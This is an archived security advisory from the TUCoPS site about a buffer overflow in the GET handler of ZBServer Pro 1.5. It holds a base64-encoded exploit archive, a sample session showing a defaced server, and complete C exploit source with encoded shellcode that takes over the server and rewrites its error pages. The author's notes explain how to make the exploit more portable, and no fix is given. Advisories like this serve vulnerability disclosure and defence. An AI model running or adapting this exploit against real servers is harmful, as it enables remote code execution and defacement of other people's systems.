Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: zbserver.htm

ZBServer Local/Remote Buffer Overflow



Vulnerability

    ZBServer

Affected

    ZBServer 1.5 Pro Edition for Win98/NT and possibly others versions

Description

    USSR  Labs   found  following.    ZBServer   Pro  Edition   is   a
    full-featured  Internet/Intranet  server  software  package   that
    includes  HTTP  (web),  Gopher,  FTP  and  Chat  Services.   Fast,
    inexpensive and easy-to-use, ZBServer  Pro is small enough  to run
    in the  background of  your Windows  95 or  NT computer to provide
    users with full  or restricted access  to files, graphics,  sounds
    or movies.   ZBServer Pro can  provide organizations of  all sizes
    enterprise-wide  web  service  to  internal  and  external  TCP/IP
    network users.

    UssrLabs  found  a  Local/Remote  Buffer  overflow.  The code that
    handles  GET  commands  has  an  unchecked  buffer that will allow
    arbitrary code to be executed if it is overflowed.

    For binary or source of this exploit go to:

        http://www.ussrback.com/

    Mimed source follows:

    ---
    Content-Type: application/octet-stream; name="zbs15exp.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="zbs15exp.zip"
    Content-MD5: ZevxKub3xk++T1mzHZZymQ==

    UEsDBBQAAgAIAEUblydpwG+hqwYAAGsZAAAGAAAATVkuQVNN7Vhbb9s4Fn6WAf+HM8UAabGq
    a9HytbMzcFPvtEAvQbxtFzsYGLJEx2plUSPSjZNfv+eQlCzK6bbozMNiESNMdG7fuZKx+PTv
    f9Gn23nqVR8i/iFKkGJfxhxikXBAcp3mUXkDVwKUmMFWqWL25Mn19XVvL2W5juJPvVjsnhhz
    B+uvi7Hb6Q0mo6LbyUQcZbLb+bjfFfint8MYM9hkkfJBqgSFGWnzgypz71euzsVuF+XJqzTn
    89nF5dvzhmypkhcoy7gj+FCmip+LXIqsZbI4pOqiFDGX0rVYzpcqKtW+cNixyHMeK4cneZ44
    jJLHn9tg5xmP8hbYVmFELpSIP3EXHZNUqyhJSjeOTEjuaC+qCrwWyT7jpghzD/RnBi0lSnmO
    oJi2d6dOJlWZ8XzelmJ7kkhF9NDtyCITqVrpmcqiNTZtfaN4twPPn8E48EdTfxL6A+aHYz8I
    w+9dBu9PANyD3oPeg/6/gk6GPgv6fmB/a9504LPBwJ80nxywSeizEEUMF9EO5Jj5AZv4IRoN
    SWfksyFCBwNNN5YFnKICWgYjxEWbwRhDGRvb0J9W2mFtifGMpj5DLWZ4kwYYYiHJmIODGsSl
    BJvoffoJwiFyRw0usQML16dcTvGMlyD8Vi8GbdrKznjyv+JkcgI3qYIbtUSB7oqp3OCo7rOv
    6VnAyV0eKbzxwGTbx9KHRJ3+ZuGUemyRhq1mH3s8dIPGZlIHxq1umuwtGGvlGQaaNuB1WUI7
    Ps1WMisYTUlg4BypLUPdgrYnM3kEYnrtwo/dKWnNAwsn/rQZ6jetLxTwa6s/9NkA+0c9HODz
    kGn/jOIZMps5KWHxHIVhNSjUoT4uNKCpYVaHti7J6e+IOjk2jkI71NqAFqU5tc/hqPKsj4/a
    0WRgeBbcnA/WmdYbVqA2mgrEGh/Ht0qtb8ZBn2LMgNKz1qmztKCD8OjV/v0T6zsbdQ96D/o/
    BEqbkVX/xOkccV5LVhnPr9QWAPgfe/0i8+PjhtjRZc47zCkI+xIK63ae/vvZcnH5fnFJr0nw
    cPlifrn4gAuQtXz59g0EveEjWLx5Du9QD169PF+8WS5g/uvlYvF68eaf3c65KG48L1nDAwcK
    7eCS74Ti8Gy/2fAS3n7mm0xc9x74gPkCJWzs1jczeCdlCa+itXxQFcPINt97A2BxXLR3Mrri
    M7hdy2DIDwW8EFK9LE4CWhyiXZE1FVl/2Asnk1447o0q5L7JPfM8Ku6Pj4mgl8trGSVcxmVa
    qFTk1ANdfTYcaZm8kSupIrWXtSigf7jdzoflnF5RQapyHytUfs9LiRCQXMMvSL5Ir7YuS94+
    P3oCDP3U998CSPYFPPzlEakvb6Tiu6V2b/XdeJrq6evosNSv6tL6I867pHh+ZemseM/zRJQv
    842wrCoJ5Ev9qo0AdAuwSvM6MZnmq020S7ObKg9kFKJUDZJsIEkq8paXggKemPD6j1zkyhvl
    T95tFNoWGorGyuLm+906kpwo6n23sxVSXURltONqy0tyh0071mNt5lir9/vHQAyfnQqwYKs4
    ymmz6dsXGq6zDcaVzTCosryBFFB+5rPx1j9TYNVACVDbVALF88NZNcIuVgZm6lwu+VxiMdL8
    anHQG137FJ9+mIHlAzcCvZ96+KkduIaVA5erk8rjbJ+YDdlDgnhxvKW7KsVzKoPeGrm5yrF0
    t9OzBxfdTs26He8gSo9HBx9XRa2RWtdUglRSUzFScU3J1MdVayKV1NS6QJQCqYu93HqPgwAf
    z6Msc67ZkPdafPZ+q+P83V/M/4Xc2Go2L+uQvUNl8gMmXE1iSPA4sG6jzIcoQ6Igryackhf5
    rSfjSK6RyoXyTAqFKKwG4ZAl629P9BMeW33tTZJzbRTvCo8OeyhUCb+h4Hc6jLyPHF2sYhP3
    KsPA79ZlVhlbV/Idz1WEOcQiV2m+59SZjEcmV3dDmAApGB2ezlNsNpIrsPuu4vaDfrCtanm8
    kWw03ZbR1Eo/YjTetzE1qrlDtLUhotkZmea94yGD1a1qiJ4n/QQ8z4OnF6JUdwDry80WDp1N
    2N1DK+uT8miA+uKzBUIsJ2+Z3nKQdCg5qA0O5VXB1jvcc0v48bYSpSK/FuWnNL9Ctr45Xtmr
    Y/jJYrunBfwMP7VPlZ8Jcld4mNGK54ne7dWUzExHAEBvPVTDx2pw9Ai5Ycz+a8NNhiffVtrV
    aH7pOa2K1DF+IVv36KJs20ccZmsTnd1Z8+NtdWOa7ZV4PeyVqHEl3+20duLsi0HS1wYKTX+X
    qMqPda0bgL9AH5p0iP4HUEsDBBQAAgAIACQblyd5NhCWagAAAH4AAAAIAAAATUFLRS5CQVRz
    SE3OyFfIT0vj5Uq2iilJLM6NScrMAzOMjRT0c3OA2FhBv0pBv1AhtxJNUU5mXjZQlW6Fgn5I
    QaqCfrKCfmIBUJleflKWTlVSsaFpakWBjo5CZm5BflGJsZFeTmYSL1dKao6CFkgJLxcAUEsD
    BBQAAgAIAGe8VifRm+4XowAAADkBAAAIAAAAQ09ERS5JTkNtj82qwjAQhfeC7zAP4MK9Kw0W
    N/WKFFyIlNBOiJCbCcmk+Pg2Nf0BzWZ+8jHnnJt/MtaCbCCDUMrGE1CFL94AneN/TaoWWvqw
    XgFcYtD7sSnGBrbw/XZgXHfFgL7DdiJJqYAMTaOTLKPN5LyY0aX4dLQHKxosz2Ay+0v9EJVC
    P3H3PuNJ2tbgY8HpnPwvsoucYCGNgUEif30Skyty7eejbcs3UEsBAhQAFAACAAgARRuXJ2nA
    b6GrBgAAaxkAAAYAAAAAAAAAAQAgAAAAAAAAAE1ZLkFTTVBLAQIUABQAAgAIACQblyd5NhCW
    agAAAH4AAAAIAAAAAAAAAAEAIAAAAM8GAABNQUtFLkJBVFBLAQIUABQAAgAIAGe8VifRm+4X
    owAAADkBAAAIAAAAAAAAAAEAIAAAAF8HAABDT0RFLklOQ1BLBQYAAAAAAwADAKAAAAAoCAAA
    AAA=

    -----

    |Zan  added  following.   USSRBACK  found  an  buffer  overflow in
    ZBServer (GET command).   Well, it is  an exploit tested  on WinNT
    4.0 (spanish version).  It comes back with a raw eip in code  (not
    jumps against  "call register" or "jmp register").  If you want  a
    real portable exploit  you can replace  last four bytes  against a
    call edi + x where x > 10 bytes.

    ZBServer PRO's  WebServer has  an overflow  in "get  command".  It
    can't  handle  a  long  excesive  request.   When the string has a
    lenght  about  766  bytes  it  crashs.   The stack is overwritten.
    |Zan  exploited  and  finished  its  exploit  for  WinNT  and it's
    attached  with  this  advisory.   Arbitrary  code  can  run   with
    webserver privileges.  Win9x  version can't be exploitable  with a
    clear environment.  If  you have a default  debugger configuration
    or your processes are handled by a special process hooking  errors
    and exceptions then it  can be exploited too  but it won't be  the
    common scenary.   Win9x version  can't run  arbitrary code  with a
    clear environment  but a  DoS attack  is possible.   You can crash
    the service with a local/remote request.

    ZBServer PRO 1.50-r1x exploit gets remote servers's full  control.
    When you  attacks a  vulnerable server  you can  run abitrary code
    inside.   Firstly,   sploit  creates  an   advisory  file.    It's
    information for administrative use.   Later, exploit restores  and
    kills  overflowed  thread   but  before  it   patchs  some   error
    information so all error pages will appear like hacked pages.   If
    you have problems  running ZBServer they  can be with  your return
    address  (remember  that  tests  ran  against  WinNT  sp5  spanish
    version).  One could jump against edi register + 5 (more portable)
    but we will have a static dll address dependence.  Well, it wasn't
    a clear jump so |Zan decided to implement the first technique  but
    the second is possible too.  Example:

        % lynx http://xxx.xxx.xxx.xxx
        
        WELCOME TO ... blah ... blah ..... (It's the root page)
        
        % lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
        
        FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was
        not found.
        
        % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
        
        FILE NOT FOUND The request object (/FileNotAvailable.html) was not
        found.
        
        $ zbsploit xxx.xxx.xxx.xxx
        
        WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net -
        http://www.deepzone.org
        
        Coded by -=[|Zan]=- izan@galaxycorp.com - izan@deepzone.org
        
        done.
        
        $ lynx http://xxx.xxx.xxx.xxx
        
        WELCOME TO ... blah ... blah ..... (It's the root page again)
        
        % lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html
        
            Hello. You are running a ZBServer PRO's buggy version and
        
                            you have been abused.
        
                    More information can be downloaded from
        
                http://www.deepzone.org or http://mareasvivas.cjb.net
        
             regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)
        
                               Coded by |Zan.
        
        
        
        % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html
        
        Server hacked.
        
        http://www.deepzone.org Sploit coded by |Zan
        
        %_

    Here is the exploit:

    /** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)
     **
     ** ZBServer PRO 1.50-r1x exploit gets remote servers's full control.
     ** When you attacks a vulnerable server you can run abitrary code
     ** inside. Firstly, sploit creates an advisory file. It's information
     ** for administrative use. Later, exploit restores and kills
     ** overflowed thread but before it patchs some error information so
     ** all error pages will appear like hacked pages.
     **
     ** Compile on Debian with kernel 2.2.12: gcc -o  slzbserv slzbserv.c
     ** run: ./slzbserv hostname
     **
     ** http://mareasvivas.cjb.net / http://www.deepzone.org
     **
     ** Coded by |Zan | izan@galaxycorp.com
     **
     **/
    
    
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <sys/errno.h>
    #include <netdb.h>
    
    #define _PORT   80
    #define _TamBuf 770
    
    char crash[] =
    "GET /"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
    "\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
    "\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
    "\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
    "\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
    "\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
    "\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
    "\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
    "\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
    "\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
    "\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
    "\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
    "\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
    "\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
    "\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
    "\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
    "\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
    "\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
    "\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
    "\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
    "\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
    "\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
    "\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
    "\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
    "\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
    "\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
    "\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
    "\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
    "\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
    "\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
    "\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
    "\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
    "\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
    "\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
    "\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
    "\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
    "\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
    "\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
    "\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
    "\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
    "\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
    "\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
    "\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";
    
    
    int     sock;
    struct  sockaddr_in sock_a;
    struct  hostent *host;
    
    int main (int argc, char *argv[]) {
    
     printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");
     printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n");
     printf("Coded by -=[ |Zan ]=-  izan@galaxycorp.com - izan@deepzone.org\n\n");
    
     if(argc < 2) {
       fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
       exit(0);
      }
    
    
     if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(-1);
      }
    
     if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("create socket");
        exit(-1);
      }
    
     sock_a.sin_family=AF_INET;
     sock_a.sin_port=htons(_PORT);
     memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
     if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
        perror("create connect");
        exit(-1);
      }
    
      fflush(stdout);
    
      write(sock,crash,_TamBuf);
      write(sock,"\n\n", 2);
      printf("done.\n\n");
    
    }

Solution

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH